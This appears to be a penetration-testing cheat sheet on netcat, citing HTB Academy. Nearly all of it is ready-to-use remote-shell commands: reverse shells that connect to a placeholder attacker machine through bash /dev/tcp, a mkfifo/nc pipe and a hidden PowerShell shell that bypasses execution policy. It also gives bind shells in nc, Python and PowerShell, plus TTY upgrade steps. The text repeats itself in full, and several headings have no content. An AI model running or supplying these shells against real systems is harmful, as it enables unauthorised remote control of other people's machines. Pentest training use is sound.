Netcat and alternatives

What is it

Netcat, ncat, or nc, is an excellent network utility for interacting with TCP/UDP ports. It can be used for many things during a pentest. Its primary usage is for connecting to shells. In addition to that, netcat can be used to connect to any listening port and interact with the service running on that port. For example, SSH is programmed to handle connections over port 22 to send all data and keys. We can connect to TCP port 22 with netcat netcat 10.10.10.10 22

Source HTB Academy

Reverse shell

nc -lvnp 1234 set a listener
- -l Listen mode, to wait for a connection to connect to us.
- -v Verbose mode, so that we know when we receive a connection.
- -n Disable DNS resolution and only connect from/to IPs, to speed up the connection.
- -p 1234 Port number netcat is listening on, and the reverse connection should be sent to.

Note we can use rlwrap in front of it this will allow us to use the arrows like in an usual shell

From our target
- bash -c 'bash -i >& /dev/tcp/attack-machine-ip/1234 0>&1'
- or rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attack-machine-ip 1234 >/tmp/f
- in powershell powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("attacking-machine-ip",1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Bind shell

Start a bind shell
- rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f
- or python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
- in powershell powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
Connect to your bind shell with netcat
- nc target-ip 1234

Upgrade TTY

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl+z background shell and get back on local terminal
stty raw -echo
fg
Enter 2 times to get back shell or reset and enter.
In another tab echo $TERM and stty size
Back to netcat shell
- export TERM=xterm-256color or the value of the $term we got previously
- stty rows 67 columns 318 put the values you had from ssty size

Transfert files with netcat

Netcat alternatives

For Windows

Socat

PreviousCrackMapExec NextNmap

Last updated 2 years ago

What is it

Source HTB Academy

Reverse shell

nc -lvnp 1234 set a listener

-l Listen mode, to wait for a connection to connect to us.
-v Verbose mode, so that we know when we receive a connection.
-n Disable DNS resolution and only connect from/to IPs, to speed up the connection.
-p 1234 Port number netcat is listening on, and the reverse connection should be sent to.

Note we can use rlwrap in front of it this will allow us to use the arrows like in an usual shell

From our target

bash -c 'bash -i >& /dev/tcp/attack-machine-ip/1234 0>&1'
or rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attack-machine-ip 1234 >/tmp/f
in powershell powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("attacking-machine-ip",1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Bind shell

Start a bind shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f
or python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
in powershell powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();

Connect to your bind shell with netcat

nc target-ip 1234

Upgrade TTY

python -c 'import pty; pty.spawn("/bin/bash")'

ctrl+z background shell and get back on local terminal

stty raw -echo

fg

Enter 2 times to get back shell or reset and enter.

In another tab echo $TERM and stty size

Back to netcat shell

export TERM=xterm-256color or the value of the $term we got previously
stty rows 67 columns 318 put the values you had from ssty size